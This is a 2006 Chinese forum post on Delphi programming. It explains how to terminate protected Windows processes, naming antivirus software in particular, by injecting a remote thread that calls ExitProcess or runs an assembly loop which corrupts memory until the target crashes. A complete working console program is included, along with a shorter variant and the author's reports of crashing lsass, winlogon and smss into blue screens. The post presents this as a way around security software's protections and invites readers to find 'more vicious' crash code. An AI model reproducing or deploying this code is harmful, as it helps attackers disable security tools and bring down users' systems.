[转贴From DFW]远程爆破，另类结束进程的方式（插入线程式）

作者: 木桩
标题: [原创]远程爆破，另类结束进程的方式（插入线程式）
关键字: 结束进程 爆破
分类: 个人专区
密级: 公开

(评分: , 回复: 3, 阅读: 87) »»

老套结束进程方式是OpenProcess，然后TerminateProcess。但是遇到那些Hook过TerminateProcess的程序，以及内核模式的程序（比如很多杀毒软件），这招就无能为力了。TerminateProcess的最终结果是没有任何变化或者你的程序直接死掉...

老早就想过用其他方式来结束进程了，比如让自己也工作在内核模式...这里给出一种很简单的办法，远程爆破目标程序。说白了，就是插入一个线程到目标程序，执行一段崩溃代码，让目标从内部自己死掉。就好像扔一个炸弹道目标内部，所以叫远程爆破。


实现原理：
1.首先是怎么让目标程序崩溃。平时有遇到程序崩溃吧，还记得那段代码怎么写吗？（谁去记这种会死机的代码啊）不知道怎么写，那告诉你一个最简单的方式吧，CreateRemoteThread的开始地址，直接用0代替，自己试试读写0处的物理内存吧，是不是直接"0x00000000" 指令引用的 "0x00000000" 内存。该内存不能为 "read"。，出现这个就达到目的了。但是保险起见，还是自行写一段必然会引起崩溃的代码好些，毕竟这样稳妥些。
  其实不用那么暴力，也能让目标程序结束掉的。还记得ExitProcess()吗？就是那个只能用在自己程序里的退出API，注射 $7C81CAA2 这个的地址就好了（具体怎么获得见后面）。这样就好比扔把刀子给别人，让他去自杀...汗

2.注射线程的例子就很多了，这里略过。主要要注意，对于那些内核模式的进程，不在同级下运行是不能CreateRemoteThread的。而且最好是提升到Debug权限，不然别想远程注射。



程序实现： (全部代码在2楼)
1.EnabledDebugPrivilege(True);  //提升到Debug权限。抄Delphi下深入Windows核心编程里的

2.然后弄到进程ID，放到sc_pID里
hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + {允许远程创建线程}
      PROCESS_VM_OPERATION + PROCESS_VM_WRITE,          {允许远程VM操作 + 允许远程VM写}
      FALSE, sc_pID);

3.获取ExitProcess的地址：（XP下是 $7C81CAA2 ）
pfnStartAddr := GetProcAddress(GetModuleHandle('kernel32'), 'ExitProcess');

4.老方法，从 $7C81CAA2 处远程线程
hThread:=CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, nil, 0, TempVar);
这里也能直接把第三四步和到一块，更简洁。第二个nil是指ExitProcess的参数，反正我们要调用ExitProcess(0)，所以传nil了。

好了，执行看看，该死的QQ不声不响的关掉了，Word也是，但是lsass.exe不行，ExitProcess根本就没响应。既然这样，就直接爆破吧。

5.修改CreateRemoteThread
hThread:=CreateRemoteThread(hRemoteProcess, nil, 0, Pointer($0), Pointer($10000), 0, TempVar);
目标lsass.exe！然后“lsass.exe - 应用程序错误”
"0x00000000" 指令引用的 "0x00000000" 内存。该内存不能为 "read"。然后OpenProcess失效，因为lsass已经被干掉了。

但是要注意了，像smss.exe这种内核模式的进程，直接用CreateRemoteThread是新建不了线程的。要想hThread不是0，先让你的程序也运行在内核模式吧。
为看看效果，于是顺手把winlogin.exe spoolsv.exe services.exe也爆破掉了。然后是久违的蓝屏...
注意：千万别去动系统进程，这是我十几次重启换来的血的教训！

Pointer($0)这招，当然也有失效的时候，csrss.exe就能读0地址，不会直接死掉。所以尽量自己实现崩溃代码，让Windows告诉我们“XXX 遇到问题需要关闭。我们对此引起的不便表示抱歉。”吧！其他常见的方法，还有用VirtualAllocEx开一块超大空间，WriteProcessMemory在目标程序里乱写等，不过前提是你的权限足够大。


下面给出完整的程序代码。随便建个控制台程序，粘贴2楼代码，运行！

2006-7-25 15:24:03   

  查看评语»»»   

 2006-7-25 15:42:25    完整的 InsertThreads.dpr

program InsertThreads;
{如果您还未看懂整个程序，请保留以下信息
进程远程爆破 By 木桩
原贴地址：http://www.delphibbs.com/keylife/iblog_show.asp?xid=23375
}
{$APPTYPE CONSOLE}
uses
  SysUtils, Windows;

var inputs:String;
    sc_pID:integer;
    TempVar:Cardinal;
    hRemoteProcess, hThread : THandle;
    d_Proc_Addr, pfnStartAddr: Pointer;

//需要注射的远程进程执行代码，运行就崩溃
procedure kemThreads();
asm
  push 0
  pop eax       //eax清零
  mov esi,eax   //si,di 归零
  mov edi,eax
@@Loop:
  mov [eax],dword ptr eax //开始乱写内存，然后出错退出
  add eax,4
  jmp @@Loop
end;

//提升权限的函数，抄书的
function EnabledDebugPrivilege(const bEnabled: Boolean): Boolean;
var
  hToken: THandle;
  tp: TOKEN_PRIVILEGES;
  a: DWORD;
const
  SE_DEBUG_NAME = 'SeDebugPrivilege';
begin
  Result := False;
  if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken)) then
  begin
    tp.PrivilegeCount := 1;
    LookupPrivilegeValue(nil, SE_DEBUG_NAME, tp.Privileges[0].Luid);
    if bEnabled then
      tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
    else
      tp.Privileges[0].Attributes := 0;
    a := 0;
    AdjustTokenPrivileges(hToken, False, tp, SizeOf(tp), nil, a);
    Result := GetLastError = ERROR_SUCCESS;
    CloseHandle(hToken);
  end;
end;

begin
  EnabledDebugPrivilege(True); //提升权限

  Write('请输入目标进程pID: '); Readln(inputs);
  sc_pID:=strtoint(inputs);
  hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD + {允许远程创建线程}
      PROCESS_VM_OPERATION + PROCESS_VM_WRITE,          {允许远程VM操作 + 允许远程VM写}
      FALSE, sc_pID);
  //这里还要检查hRemoteProcess，是否OpenProcess成功..

  //随便开一块 $1000 的内存空间
  d_Proc_Addr := VirtualAllocEx(hRemoteProcess, nil, $1000, MEM_COMMIT, PAGE_READWRITE);

  //把 kemThreads() 函数写过去
  if Not(WriteProcessMemory(hRemoteProcess, d_proc_addr, @kemThreads, $800, TempVar)) then
    Writeln('WriteProcessMemory 写目标进程失败。')
  else
    begin
      { 这里注释掉了，演示了如何查找'ExitProcess'的地址
      //查找函数的地址  
      //ExitProcess(kernel32) $7C81CAA2
      //MessageBoxA(User32) $77D504EA
      pfnStartAddr := GetProcAddress(GetModuleHandle('kernel32'), 'ExitProcess');
      Write(format('函数地址: $%0.8x',[integer(pfnStartAddr)]));
      }
      Writeln(''); TempVar := 0;
      //Writeln(format('写入数据位于: %0.8x',[integer(d_Proc_Addr)]));

      //写入完成，执行                                  
      //hThread:=CreateRemoteThread(hRemoteProcess, nil, 0, Pointer($0), Pointer($10000), 0, TempVar);  //这行就是第五条所说的 0地址爆破
      hThread:=CreateRemoteThread(hRemoteProcess, nil, 0, d_Proc_Addr, nil, 0, TempVar);  //执行写入的 kemThreads() 函数
        if hThread<=0 then begin Writeln('CreateRemoteThread 执行远程线程失败。');  end;
    end;
 
  Write('执行完毕'); readln(inputs);  //按回车结束
  //VirtualFreeEx(hRemoteProcess, d_Proc_Addr, $1000, MEM_DECOMMIT);
  CloseHandle(hRemoteProcess);
end.

 

 2006-7-25 15:43:03    附上最精简的ExitProcess方式（但往往达不到结束进程的效果...）

var inputs:String;
    sc_pID:integer;
    TempVar:Cardinal;
    hRemoteProcess, hThread : THandle;
begin
  EnabledDebugPrivilege(True); //提升权限
  sc_pID:= {目标进程ID} ;
  hRemoteProcess := OpenProcess(PROCESS_CREATE_THREAD+PROCESS_VM_OPERATION+PROCESS_VM_WRITE, FALSE, sc_pID);
  hThread:=CreateRemoteThread(hRemoteProcess, nil, 0, Pointer($7C81CAA2), nil, 0, TempVar);
  Writeln('线程插入完毕，ThreadID为 '+inttostr(TempVar));
  //CloseHandle(hRemoteProcess);
end;

 

 2006-7-25 15:55:22   

上面那个ExitProcess方式，就是最简单的API调用。随便放在某个按钮里就行，注意修改sc_pID:= {目标进程ID} ;！

上面那段
procedure kemThreads();
asm
  push 0
  pop eax       //eax清零
  mov esi,eax   //si,di 归零
  mov edi,eax
@@Loop:
  mov [eax],dword ptr eax //开始乱写内存，然后出错退出
  add eax,4
  jmp @@Loop
end;
并不是最好的，也许你能找出更有效的崩溃代码。有什么更好想法的记得回复啊！
现在研究《编写安全的代码(第2版)》，如发现更狠的代码，我会第一时间贴出来...破坏无罪！


(以上这段崩溃代码，VMware虚拟机里测试过，注射smss.exe后，直接蓝屏
对付winlogin.exe后惊奇的发现，关机按钮消失了，开始菜单里只剩下注销，任务管理器里选项全灰
插入lsass.exe就没什么危害了，弹出个即将关机对话框，shutdown /a 取消半分钟后，蓝屏 unknow hard error...)